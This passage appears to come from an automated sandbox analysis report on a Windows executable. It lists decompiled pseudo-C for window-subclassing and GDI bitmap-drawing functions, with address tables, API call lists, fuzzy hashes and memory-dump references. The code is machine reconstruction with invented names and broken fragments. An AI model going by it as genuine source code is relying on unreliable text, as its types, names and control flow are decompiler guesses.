									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t394);
									L00406ABC();
								}
								__eflags = 0;
								_pop(_t464);
								 *[fs:eax] = _t464;
								_push(0x4679d6);
								E004035DC(_v20);
								return E004035DC(_v24);
							} else {
								_t507 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t447);
								 *[fs:eax] = _t447;
								_push(0x467a12);
								return E004035DC(_v16);
							}
						}
					}
				}
			}









































                                                                        0x0046745d
                                                                        0x0046745f
                                                                        0x00467465
                                                                        0x00467468
                                                                        0x0046746f
                                                                        0x0046747a
                                                                        0x0046747a
                                                                        0x00467486
                                                                        0x0046748d
                                                                        0x00467a29
                                                                        0x00467a31
                                                                        0x00467493
                                                                        0x0046749b
                                                                        0x004674ad
                                                                        0x00000000
                                                                        0x004674b3
                                                                        0x004674bb
                                                                        0x004674c7
                                                                        0x004674ca
                                                                        0x004674d7
                                                                        0x004674e0
                                                                        0x004674e2
                                                                        0x004674e9
                                                                        0x004674f7
                                                                        0x004674f7
                                                                        0x00467500
                                                                        0x0046750d
                                                                        0x0046750d
                                                                        0x0046751c
                                                                        0x0046752a
                                                                        0x00467534
                                                                        0x0046753e
                                                                        0x0046754c
                                                                        0x00467561
                                                                        0x00467571
                                                                        0x0046757d
                                                                        0x00467589
                                                                        0x00467589
                                                                        0x004675a2
                                                                        0x004675aa
                                                                        0x004675aa
                                                                        0x004675ac
                                                                        0x004675b9
                                                                        0x004675bc
                                                                        0x004675c3
                                                                        0x004675d5
                                                                        0x004675dd
                                                                        0x004675e0
                                                                        0x004675e4
                                                                        0x00467626
                                                                        0x004675e6
                                                                        0x00467602
                                                                        0x00467602
                                                                        0x00000000
                                                                        0x004675ae
                                                                        0x004675ae
                                                                        0x00467631
                                                                        0x00467636
                                                                        0x00467644
                                                                        0x00467653
                                                                        0x00467662
                                                                        0x00467670
                                                                        0x0046767a
                                                                        0x0046767d
                                                                        0x00467680
                                                                        0x00467684
                                                                        0x0046786d
                                                                        0x00467877
                                                                        0x00467887
                                                                        0x00467891
                                                                        0x00467893
                                                                        0x00467899
                                                                        0x0046789e
                                                                        0x004678a0
                                                                        0x004678b2
                                                                        0x004678b7
                                                                        0x004678bc
                                                                        0x004678d1
                                                                        0x004678d1
                                                                        0x004678db
                                                                        0x004678e8
                                                                        0x004678f2
                                                                        0x004678fc
                                                                        0x00467909
                                                                        0x00467918
                                                                        0x0046792a
                                                                        0x0046792f
                                                                        0x00467934
                                                                        0x00467936
                                                                        0x00467945
                                                                        0x00467946
                                                                        0x00467947
                                                                        0x00467948
                                                                        0x0046794a
                                                                        0x00467953
                                                                        0x00467954
                                                                        0x00467961
                                                                        0x00467970
                                                                        0x00467982
                                                                        0x00467987
                                                                        0x0046798c
                                                                        0x0046798e
                                                                        0x0046799d
                                                                        0x0046799e
                                                                        0x0046799f
                                                                        0x004679a0
                                                                        0x004679a2
                                                                        0x004679ab
                                                                        0x004679ac
                                                                        0x0046768a
                                                                        0x00467692
                                                                        0x0046769c
                                                                        0x004676a9
                                                                        0x004676b3
                                                                        0x004676bf
                                                                        0x004676c9
                                                                        0x004676dc
                                                                        0x004676e4
                                                                        0x004676ed
                                                                        0x004676f1
                                                                        0x004676f9
                                                                        0x004676fa
                                                                        0x0046770a
                                                                        0x00467717
                                                                        0x0046771c
                                                                        0x00467727
                                                                        0x0046772c
                                                                        0x00467731
                                                                        0x00467733
                                                                        0x00467742
                                                                        0x00467743
                                                                        0x00467744
                                                                        0x00467745
                                                                        0x00467747
                                                                        0x00467749
                                                                        0x0046774a
                                                                        0x0046775f
                                                                        0x00467767
                                                                        0x00467770
                                                                        0x00467774
                                                                        0x0046777c
                                                                        0x0046777d
                                                                        0x0046778d
                                                                        0x0046779a
                                                                        0x0046779f
                                                                        0x004677aa
                                                                        0x004677af
                                                                        0x004677b4
                                                                        0x004677b6
                                                                        0x004677c5
                                                                        0x004677c6
                                                                        0x004677c7
                                                                        0x004677c8
                                                                        0x004677ca
                                                                        0x004677cc
                                                                        0x004677cd
                                                                        0x004677dd
                                                                        0x004677e1
                                                                        0x004677e9
                                                                        0x004677ea
                                                                        0x004677f2
                                                                        0x004677fb
                                                                        0x004677ff
                                                                        0x00467807
                                                                        0x00467808
                                                                        0x00467818
                                                                        0x00467825
                                                                        0x0046782a
                                                                        0x00467835
                                                                        0x0046783a
                                                                        0x0046783f
                                                                        0x00467841
                                                                        0x00467850
                                                                        0x00467851
                                                                        0x00467852
                                                                        0x00467853
                                                                        0x00467855
                                                                        0x00467857
                                                                        0x00467858
                                                                        0x00467858
                                                                        0x004679b1
                                                                        0x004679b3
                                                                        0x004679b6
                                                                        0x004679b9
                                                                        0x004679c1
                                                                        0x004679ce
                                                                        0x004675b0
                                                                        0x004675b1
                                                                        0x004675b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004679f5
                                                                        0x004679f7
                                                                        0x004679fa
                                                                        0x004679fd
                                                                        0x00467a0a
                                                                        0x00467a0a
                                                                        0x004675ae
                                                                        0x004675ac
                                                                        0x004674ad

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DA
                                                                        • API String ID: 0-2080325668
                                                                        • Opcode ID: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction ID: 1aaab0506d005b2b6a366c37f16578aea9443783ae75c99a7e7321e86aad177a
                                                                        • Opcode Fuzzy Hash: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction Fuzzy Hash: FC025074B04115AFD700EBA9D986E9EB7F5EF48318F10456AF404EB392DA38ED01CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004787FC, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 174windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E004787FC(int __eax, void* __eflags) {
				int _v8;
				char* _t87;
				int _t89;
				long _t92;
				int _t117;
				struct HWND__* _t146;
				void* _t149;
				void* _t150;
				struct HWND__* _t151;
				intOrPtr _t162;
				struct HWND__* _t168;
				void* _t170;
				struct HWND__* _t171;
				struct HWND__* _t172;
				intOrPtr _t174;
				intOrPtr _t176;

				_t174 = _t176;
				_v8 = __eax;
				E0042D3EC(_v8);
				_t146 = GetWindow(E0043CC2C(_v8), 5);
				 *(_v8 + 0x248) = _t146;
				_t168 = _t146;
				 *(_v8 + 0x268) = _t168;
				 *((intOrPtr*)(_v8 + 0x26c)) = GetWindowLongA(_t168, 0xfffffffc);
				SetWindowLongA( *(_v8 + 0x268), 0xfffffffc,  *(_v8 + 0x270));
				if( *((intOrPtr*)(_v8 + 0x281)) - 2 < 0) {
					_t151 = GetWindow(GetWindow(E0043CC2C(_v8), 5), 5);
					if(_t151 != 0) {
						if( *((char*)(_v8 + 0x281)) == 1) {
							_t172 = _t151;
							 *(_v8 + 0x244) = _t172;
							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t172, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
							_t151 = GetWindow(_t151, 2);
						}
						_t171 = _t151;
						 *(_v8 + 0x240) = _t171;
						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t171, 0xfffffffc);
						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
					}
				}
				_t87 =  *0x495a04; // 0x496b70
				if( *_t87 != 0 &&  *(_v8 + 0x240) != 0) {
					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
				}
				if( *((intOrPtr*)(_v8 + 0x27c)) == 0) {
					_t89 = _v8;
					if( *((intOrPtr*)(_t89 + 0x278)) != 0) {
						_t92 = E004436E8( *((intOrPtr*)(_v8 + 0x278)));
						_t89 = PostMessageA(E0043CC2C(_v8), 0x402, 0, _t92);
					}
					return _t89;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x20))();
					 *((char*)(_v8 + 0x280)) = 1;
					 *[fs:eax] = _t176;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 8))( *[fs:eax], 0x4789fe, _t174);
					_t149 = E0041521C( *((intOrPtr*)(_v8 + 0x284))) - 1;
					if(_t149 >= 0) {
						_t150 = _t149 + 1;
						_t170 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x2c))();
							_t170 = _t170 + 1;
							_t150 = _t150 - 1;
						} while (_t150 != 0);
					}
					E0040BAFC(_v8 + 0x27c);
					E004366A0(_v8);
					_pop(_t162);
					 *[fs:eax] = _t162;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x24))(0x478a05);
					_t117 = _v8;
					 *((char*)(_t117 + 0x280)) = 0;
					return _t117;
				}
			}



















                                                                        0x004787fd
                                                                        0x00478802
                                                                        0x00478808
                                                                        0x0047881d
                                                                        0x00478822
                                                                        0x00478828
                                                                        0x0047882d
                                                                        0x0047883e
                                                                        0x0047885a
                                                                        0x0047886a
                                                                        0x00478888
                                                                        0x0047888c
                                                                        0x0047889c
                                                                        0x004788a1
                                                                        0x004788a3
                                                                        0x004788b4
                                                                        0x004788d0
                                                                        0x004788dd
                                                                        0x004788dd
                                                                        0x004788e2
                                                                        0x004788e4
                                                                        0x004788f5
                                                                        0x00478911
                                                                        0x00478911
                                                                        0x0047888c
                                                                        0x00478916
                                                                        0x0047891e
                                                                        0x0047893f
                                                                        0x0047893f
                                                                        0x0047894e
                                                                        0x00478a05
                                                                        0x00478a0f
                                                                        0x00478a1a
                                                                        0x00478a30
                                                                        0x00478a30
                                                                        0x00478a39
                                                                        0x00478954
                                                                        0x0047895f
                                                                        0x00478965
                                                                        0x00478977
                                                                        0x0047898e
                                                                        0x004789a1
                                                                        0x004789a4
                                                                        0x004789a6
                                                                        0x004789a7
                                                                        0x004789a9
                                                                        0x004789b6
                                                                        0x004789b9
                                                                        0x004789ba
                                                                        0x004789ba
                                                                        0x004789a9
                                                                        0x004789c5
                                                                        0x004789d3
                                                                        0x004789da
                                                                        0x004789dd
                                                                        0x004789f0
                                                                        0x004789f3
                                                                        0x004789f6
                                                                        0x004789fd
                                                                        0x004789fd

                                                                        APIs
                                                                          • Part of subcall function 0042D3EC: SendMessageA.USER32 ref: 0042D40C
                                                                        • GetWindow.USER32(00000000,00000005), ref: 00478818
                                                                        • GetWindowLongA.USER32 ref: 00478836
                                                                        • SetWindowLongA.USER32 ref: 0047885A
                                                                        • GetWindow.USER32(00000000,00000005), ref: 0047887D
                                                                        • GetWindow.USER32(00000000,00000000), ref: 00478883
                                                                        • GetWindowLongA.USER32 ref: 004788AC
                                                                        • SetWindowLongA.USER32 ref: 004788D0
                                                                        • GetWindow.USER32(00000000,00000002), ref: 004788D8
                                                                        • GetWindowLongA.USER32 ref: 004788ED
                                                                        • SetWindowLongA.USER32 ref: 00478911
                                                                        • SendMessageA.USER32 ref: 0047893F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Long$MessageSend
                                                                        • String ID: pkI
                                                                        • API String ID: 1593136606-582613530
                                                                        • Opcode ID: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction ID: c93d556c733353f28b80892d9748ad900ab6ec26727c7c5ce3df2aa97b74d364
                                                                        • Opcode Fuzzy Hash: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction Fuzzy Hash: CB61F074A04105EFDB10EB99C989E9D77F4EB09314F2541F9F508AB3A2CB74AE40DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004245C4, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E004245C4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x424810; // 0xf
				E00420804(_v8, __ecx, _t167);
				E00424C34(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406C5C();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406C2C();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406B8C();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406B8C();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L4:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L4;
					}
				}
				if(_t80 == 0) {
					if(E00424950(_t159) == 0) {
						SetStretchBltMode(E00420730(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x424801);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424BD4(_t159, _t160);
				}
				_t87 = E00424894(_t159);
				_t171 =  *0x424810; // 0xf
				E00420804(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00424894(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(E00424808);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406C5C();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x424796);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406AE4();
					_v28 = E00420B28(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E00420CCC( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00424894(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x4247db);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}





























                                                                        0x004245c4
                                                                        0x004245c5
                                                                        0x004245c7
                                                                        0x004245cd
                                                                        0x004245cf
                                                                        0x004245d2
                                                                        0x004245d4
                                                                        0x004245d7
                                                                        0x004245e0
                                                                        0x004245e7
                                                                        0x004245ee
                                                                        0x004245f1
                                                                        0x004245f5
                                                                        0x004245fa
                                                                        0x004245fc
                                                                        0x004245fe
                                                                        0x00424602
                                                                        0x00424605
                                                                        0x00424606
                                                                        0x0042460b
                                                                        0x00424614
                                                                        0x00424615
                                                                        0x0042461a
                                                                        0x0042461a
                                                                        0x0042461e
                                                                        0x00424623
                                                                        0x00424626
                                                                        0x00424627
                                                                        0x0042462c
                                                                        0x0042462d
                                                                        0x00424632
                                                                        0x00424636
                                                                        0x0042463b
                                                                        0x0042463f
                                                                        0x00424644
                                                                        0x00424655
                                                                        0x00424655
                                                                        0x00424646
                                                                        0x0042464a
                                                                        0x00424653
                                                                        0x00424659
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00424653
                                                                        0x0042465d
                                                                        0x004246a0
                                                                        0x004246ad
                                                                        0x004246ad
                                                                        0x0042465f
                                                                        0x0042466a
                                                                        0x00424678
                                                                        0x00424690
                                                                        0x00424690
                                                                        0x004246b4
                                                                        0x004246b5
                                                                        0x004246ba
                                                                        0x004246bd
                                                                        0x004246c9
                                                                        0x004246cd
                                                                        0x004246cd
                                                                        0x004246d4
                                                                        0x004246d9
                                                                        0x004246df
                                                                        0x004246ed
                                                                        0x004247d6
                                                                        0x004247dd
                                                                        0x004247e0
                                                                        0x004247e3
                                                                        0x004247ec
                                                                        0x004247ee
                                                                        0x004247f3
                                                                        0x004247f7
                                                                        0x004247fa
                                                                        0x004247fb
                                                                        0x00000000
                                                                        0x004247fb
                                                                        0x00424800
                                                                        0x004246f3
                                                                        0x004246f5
                                                                        0x004246fa
                                                                        0x004246ff
                                                                        0x00424700
                                                                        0x00424705
                                                                        0x00424708
                                                                        0x0042470d
                                                                        0x00424717
                                                                        0x00424727
                                                                        0x00424761
                                                                        0x00424766
                                                                        0x00424768
                                                                        0x0042476b
                                                                        0x0042476e
                                                                        0x00424777
                                                                        0x00424781
                                                                        0x00424781
                                                                        0x0042478a
                                                                        0x00000000
                                                                        0x00424790
                                                                        0x00424795
                                                                        0x00424795

                                                                        APIs
                                                                          • Part of subcall function 00424C34: 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        • 72E7B410.GDI32(?,?,000000FF), ref: 00424606
                                                                        • 72E7B150.GDI32(?,?,?,000000FF), ref: 00424615
                                                                        • 72E7AD70.GDI32(?,0000000C), ref: 00424627
                                                                        • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 004246AD
                                                                        • 72E7A590.GDI32(00000000,00000000,00424796,?,?,0000000E,00000000,?,0000000C), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424781
                                                                        • DeleteDC.GDI32(00000000), ref: 00424790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                        • String ID:
                                                                        • API String ID: 2051775979-0
                                                                        • Opcode ID: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction ID: 9c0590f5a5351f0b339d81a561568dd9393c85642e681a1d1bb2e02d323cf42c
                                                                        • Opcode Fuzzy Hash: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction Fuzzy Hash: D4716AB5B00215AFDB10EFA9D985F5ABBF8EB49304F51856AB508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00420B38, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 51%
                                                                        			E00420B38(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406AE4();
				_v28 = __eax;
				_push(0);
				L00406AE4();
				_v32 = __eax;
				_push(_t87);
				_push(0x420c86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00406EB4();
					_v24 = _t37;
					if(_v24 == 0) {
						E00420A80(__ecx);
					}
					_push(_t87);
					_push(0x420bf5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00406ADC();
					_v20 = _t41;
					if(_v20 == 0) {
						E00420A80(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x420bfc);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407124();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00406ACC();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E00420C8D);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                                                        0x00420b39
                                                                        0x00420b3b
                                                                        0x00420b46
                                                                        0x00420b47
                                                                        0x00420b48
                                                                        0x00420b4a
                                                                        0x00420b4d
                                                                        0x00420b4f
                                                                        0x00420b54
                                                                        0x00420b57
                                                                        0x00420b59
                                                                        0x00420b5e
                                                                        0x00420b63
                                                                        0x00420b64
                                                                        0x00420b69
                                                                        0x00420b6c
                                                                        0x00420b79
                                                                        0x00420b80
                                                                        0x00420b9a
                                                                        0x00420b9c
                                                                        0x00420ba1
                                                                        0x00420ba8
                                                                        0x00420baa
                                                                        0x00420baa
                                                                        0x00420bb1
                                                                        0x00420bb2
                                                                        0x00420bb7
                                                                        0x00420bba
                                                                        0x00420bc0
                                                                        0x00420bc4
                                                                        0x00420bc5
                                                                        0x00420bc8
                                                                        0x00420bc9
                                                                        0x00420bce
                                                                        0x00420bd5
                                                                        0x00420bd7
                                                                        0x00420bd7
                                                                        0x00420bde
                                                                        0x00420be1
                                                                        0x00420be4
                                                                        0x00420be9
                                                                        0x00420bec
                                                                        0x00420bed
                                                                        0x00420bef
                                                                        0x00420bf4
                                                                        0x00420b82
                                                                        0x00420b82
                                                                        0x00420b84
                                                                        0x00420b86
                                                                        0x00420b8b
                                                                        0x00420b8c
                                                                        0x00420b8f
                                                                        0x00420b90
                                                                        0x00420b95
                                                                        0x00420c00
                                                                        0x00420c0f
                                                                        0x00420c1e
                                                                        0x00420c45
                                                                        0x00420c4c
                                                                        0x00420c53
                                                                        0x00420c53
                                                                        0x00420c5a
                                                                        0x00420c61
                                                                        0x00420c61
                                                                        0x00420c5a
                                                                        0x00420c68
                                                                        0x00420c6b
                                                                        0x00420c6e
                                                                        0x00420c77
                                                                        0x00420c85
                                                                        0x00420c85

                                                                        APIs
                                                                        • 72E7A590.GDI32(00000000), ref: 00420B4F
                                                                        • 72E7A590.GDI32(00000000,00000000), ref: 00420B59
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00420B79
                                                                        • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420B90
                                                                        • 72E7AC50.USER32(00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420B9C
                                                                        • 72E7A520.GDI32(00000000,?,?,00000000,00420BF5,?,00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420BC9
                                                                        • 72E7B380.USER32(00000000,00000000,00420BFC,00000000,00420BF5,?,00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420BEF
                                                                        • SelectObject.GDI32(?,?), ref: 00420C0A
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C19
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420C45
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C53
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C61
                                                                        • DeleteDC.GDI32(?), ref: 00420C77
                                                                        • DeleteDC.GDI32(?), ref: 00420C80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                        • String ID:
                                                                        • API String ID: 956127455-0
                                                                        • Opcode ID: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction ID: 6c023867643c450f6ef70e7d5508629062c5f15d3a4c00019323062e5ea54a1e
                                                                        • Opcode Fuzzy Hash: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction Fuzzy Hash: 9E4120B1E44215AFDB10EBE5DC46FAFB7FCEB08704F514426B605F7281C678A9408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043DA84, Relevance: 19.7, APIs: 13, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 50%
                                                                        			E0043DA84(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t115;
